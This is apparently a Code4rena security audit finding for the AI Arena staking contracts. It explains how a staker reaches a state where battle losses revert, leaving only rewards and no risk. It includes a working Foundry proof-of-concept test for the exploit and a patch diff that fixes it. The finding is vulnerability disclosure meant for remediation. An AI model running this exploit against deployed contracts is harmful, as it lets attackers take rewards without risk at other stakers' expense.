### ISSUE TITLE
The attacker could achieve a state where he has `amountStaked > 0` and `fighterStaked = false` and start earning risk-free rewards.

### ISSUE THREAD

**Issue by c4-bot-6** [code-423n4/2024-02-ai-arena-findings#1795]
# Lines of code

https://github.com/code-423n4/2024-02-ai-arena/blob/cd1a0e6d1b40168657d1aaee8223dc050e15f8cc/src/RankedBattle.sol#L479-L490
https://github.com/code-423n4/2024-02-ai-arena/blob/cd1a0e6d1b40168657d1aaee8223dc050e15f8cc/src/RankedBattle.sol#L252-L264
https://github.com/code-423n4/2024-02-ai-arena/blob/cd1a0e6d1b40168657d1aaee8223dc050e15f8cc/src/RankedBattle.sol#L285-L287
https://github.com/code-423n4/2024-02-ai-arena/blob/cd1a0e6d1b40168657d1aaee8223dc050e15f8cc/src/FighterFarm.sol#L539-L545

# Vulnerability details

## Impact
The user could achieve a state where he has `amountStaked > 0` and `fighterStaked = false`. This could allow him to transfer the nft to another address. Taking advantage of another vulnerability that arises from transferring the fighter NFT to another address he could reach a state where it is impossible to lose any stake. He could stake as much as he wants and not be afraid of losing any stake as it will fail.
## Proof of Concept
The hacker would need to use two addresses for this exploit to work. The addresses are labeled as "hacker" and "hacker2" in the POC.

Hacker starts off with a `stake` of `1 NRN` token (could be anything that he is willing to lose). His first main goal is to lose and put some amount of NRN tokens at risk.

Now when he loses something, he can unstake everything that he has remaining. This is needed to achieve the following state.

```solidity
amountStaked[tokenId] = 0;
stakeAtRisk[roundId][tokenId] = X; // where X > 0
fighterStaked[tokenId] = false;
```

Now his main goal is that until the end of a round, he reclaims a part of the stake and keeps it.(eg. `> 0 stake` to `reclaim`). This will set `amountStaked[tokenId] > 0`. After the new round is started we have the following state

```solidity
amountStaked[tokenId] = X; // where X > 0, the part of stake he reclaimed in the previous round
stakeAtRisk[roundId][tokenId] = 0; 
fighterStaked[tokenId] = false;
```

Ooops. The hacker just achieved the state where he has `amountStaked > 0` and `fighterStaked` set to `false` meaning he can transfer the NFT to another address. Keep in mind that the `amountStaked` is not round dependent and is carried over to the next round.

Now the main goal of the hacker is again to win at least once. He has to win in a new round in order to have a following state. Let's assume he wins `1500 points`.

The state is as follows:
```solidity
accumulatedPointsPerFighter(tokenId, roundId) = 1500;
accumulatedPointsPerAddress(hacker, roundId)  = 1500;
```
Everything is fine here but let's see what happens on nft transfer. He then proceeds to transfer the NFT to another `address(hacker2)` as he is allowed because `fighterStaked[tokenId] = false`; 

```solidity
function _ableToTransfer(uint256 tokenId, address to) private view returns(bool) {
    return (
      _isApprovedOrOwner(msg.sender, tokenId) &&
      balanceOf(to) < MAX_FIGHTERS_ALLOWED &&
      !fighterStaked[tokenId]
    );
}
```
The fighter NFT is `successfully transferred` to a new address (hacker2) which has the following state.
```solidity
accumulatedPointsPerFighter(tokenId, roundId) = 1500;
accumulatedPointsPerAddress(hacker2, roundId) = 0;
```
The points added to the `tokenId` are still `1500` but the points for the owner of the nft
are 0 because the nft got transferred from `hacker` to `hacker2`.

The hacker will now proceed to stake a large amount of NRN tokens on which he can earn rewards on. The current state allows a hacker to win but never to lose a part of his stake (he could still lose any new point accumulated during the round). He cannot lose a part of the stake as when a loss occurs first the points are subtracted from the tokenId if it has any, which in our case it does.

```solidity
else if (battleResult == 2) {
    ...
    if (accumulatedPointsPerFighter[tokenId][roundId] > 0) {
        /// If the fighter has a positive point balance for this round, deduct points 
        points = stakingFactor[tokenId] * eloFactor;
        if (points > accumulatedPointsPerFighter[tokenId][roundId]) {
            points = accumulatedPointsPerFighter[tokenId][roundId];
        }
        accumulatedPointsPerFighter[tokenId][roundId] -= points;
        accumulatedPointsPerAddress[fighterOwner][roundId] -= points;     <- THIS UNDERFLOWS
        totalAccumulatedPoints[roundId] -= points; 
        if (points > 0) {
            emit PointsChanged(tokenId, points, false);
        }
    } else {
        ...
    }
}
```

As we can see there is a check `if (points > accumulatedPointsPerFighter[tokenId][roundId])` which will limit the points to the amount that the fighter has accumulated in the round which is `1500`. It will continue to subtract the points from the two mappings, but subtracting from the `accumulatedPointsPerAddress` mapping will revert as its value is 0.

#### Coded POC
Add test to `RankedBattle.t.sol` and run with `forge test --match-path ./test/RankedBattle.t.sol -vvv`

```solidity
function testAvoidLossTransfer() public {
    /*
        The user in this POC is needed so the owner can start a new round
        which requires totalAccumulatedPoints[roundId] > 0.

        This should naturally be the case as other users besides the hacker
        are using the protocol.

        The user wins and loses can be ignored in this POC. They are just
        needed for the totalAccumulatedPoints[roundId] to be greater than 0
        when starting a new round.
    */
    address hacker = vm.addr(3);
    address user = vm.addr(4);
    address hacker2 = vm.addr(5);

    // Mint some NRN tokens to hacker and hacker2 addresses
    _fundUserWith4kNeuronByTreasury(hacker2);
    _fundUserWith4kNeuronByTreasury(hacker);

    // Mint nft to the hacker
    _mintFromMergingPool(hacker);

    // Mint some NRN tokens and a nft to the user
    _fundUserWith4kNeuronByTreasury(user);
    _mintFromMergingPool(user);

    uint256 stakeAmount = 1 * 10 ** 18;
    uint256 stakeAmount2 = 3000 * 10 ** 18;
    uint256 userStake = 150 * 10 ** 18;

    // tokenId 0 is owned by the hacker
    uint256 tokenId = 0;

    // tokenId 1 is owned by the user
    uint256 tokenIdUser = 1;
    uint256 roundId = 0;

    uint8 win = 0;
    uint8 loss = 2;

    // Hacker stakes something small that he doesn't care about losing.
    // In this case 1 NRN token
    vm.prank(hacker);
    _rankedBattleContract.stakeNRN(stakeAmount, tokenId);

    // User also stakes some tokens
    vm.prank(user);
    _rankedBattleContract.stakeNRN(userStake, tokenIdUser);

    // Hacker losses
    vm.prank(address(_GAME_SERVER_ADDRESS));
    _rankedBattleContract.updateBattleRecord(tokenId, 50, loss, 1500, true);

    // User wins
    vm.prank(address(_GAME_SERVER_ADDRESS));
    _rankedBattleContract.updateBattleRecord(tokenIdUser, 50, win, 1500, true);

    uint256 amountStaked = _rankedBattleContract.amountStaked(tokenId);

    // Unastake everything to set amountStaked to 0 and fighterStaked to false
    vm.prank(hacker);
    _rankedBattleContract.unstakeNRN(amountStaked, tokenId);

    assertEq(_rankedBattleContract.amountStaked(tokenId), 0);
    assertEq(_fighterFarmContract.fighterStaked(tokenId), false);

    /*
        Try to win and regain stake by winning, just need to reclaim > 0 stake.
        No need to reclaim everything.
    */

    // User Wins
    vm.prank(address(_GAME_SERVER_ADDRESS));
    _rankedBattleContract.updateBattleRecord(tokenId, 50, win, 1500, true);

    // At this point the hacker has amountStaked > 0 but fighterStaked is false
    assertEq(_rankedBattleContract.amountStaked(tokenId) > 0, true);
    assertEq(_fighterFarmContract.fighterStaked(tokenId), false);

    // The new round is started by the admin
    _rankedBattleContract.setNewRound();
    // Only for internal accounting
    roundId += 1;

    /*
        At this point, the hacker still has amountStaked > 0 but fighterStaked is false
        even though the new round started. The amountStaked is not dependent on the roundId
    */
    assertEq(_rankedBattleContract.amountStaked(tokenId) > 0, true);
    assertEq(_fighterFarmContract.fighterStaked(tokenId), false);

    // Hacker wins in a new round
    vm.prank(address(_GAME_SERVER_ADDRESS));
    _rankedBattleContract.updateBattleRecord(tokenId, 0, win, 1500, true);

    /*
        He has to win in a new round in order to have a following state.
        Let's assume he wins 1500 points in the call above.
        The state is as follows:

        accumulatedPointsPerFighter(tokenId, roundId) = 1500;
        accumulatedPointsPerAddress(hacker, roundId)  = 1500;

        Everything is fine here but let's see what happens on nft transfer
    */
    assertEq(_rankedBattleContract.accumulatedPointsPerFighter(tokenId, roundId) > 0, true);
    assertEq(_rankedBattleContract.accumulatedPointsPerAddress(hacker, roundId) > 0, true);
    // Keep in mind the fighter is still unstaked while having amountStaked > 0 and accumulatedPoints > 0
    assertEq(_fighterFarmContract.fighterStaked(tokenId), false);

    // Transfer nft to hacker2
    assertEq(_fighterFarmContract.ownerOf(tokenId), hacker);

    vm.prank(hacker);
    _fighterFarmContract.transferFrom(hacker, hacker2, tokenId);

    // Check if the transfer is successful
    assertEq(_fighterFarmContract.ownerOf(tokenId), hacker2);

    /*
        The state now is as follows:

        accumulatedPointsPerFighter(tokenId, roundId) = 1500;
        accumulatedPointsPerAddress(hacker2, roundId) = 0;

        The points added to the tokenId are still 1500 but the points for the owner of the nft
        are 0 because the nft got transferred from hacker to hacker2.
    */
    assertEq(_rankedBattleContract.accumulatedPointsPerFighter(tokenId, roundId) > 0, true);
    assertEq(_rankedBattleContract.accumulatedPointsPerAddress(hacker2, roundId) == 0, true);

    // Hacker now stakes a lot of NRN tokens as he can not possibly lose the stake
    // because of the underflow
    vm.prank(hacker2);
    _rankedBattleContract.stakeNRN(stakeAmount2, tokenId);

    /*
        Now when he loses it will fail because of substracting points

        accumulatedPointsPerAddress(hacker2, roundId) == 0

        But the updateBattleRecord would want to substract points from 0 which reverts.
    */
    vm.expectRevert();
    vm.prank(address(_GAME_SERVER_ADDRESS));
    _rankedBattleContract.updateBattleRecord(tokenId, 0, loss, 1500, true);

    // Hacker2 can still win and earn points. He can now only make a profit.
    vm.prank(address(_GAME_SERVER_ADDRESS));
    _rankedBattleContract.updateBattleRecord(tokenId, 0, win, 1500, true);

}
```
## Tools Used
Manual review
## Recommended Mitigation Steps
Update the staking status to true if the user reclaims a part of the stake and the current staking status is false. This will prevent transferring the nft in such cases.
```diff
if (curStakeAtRisk > 0) {
    _stakeAtRiskInstance.reclaimNRN(curStakeAtRisk, tokenId, fighterOwner);
    amountStaked[tokenId] += curStakeAtRisk;
    
+   if(_fighterFarmInstance.fighterStaked(tokenId) == false && amountStaked[tokenId] > 0) {
+        _fighterFarmInstance.updateFighterStaking(tokenId, true);
+   }
}
```

## Assessed type

Other
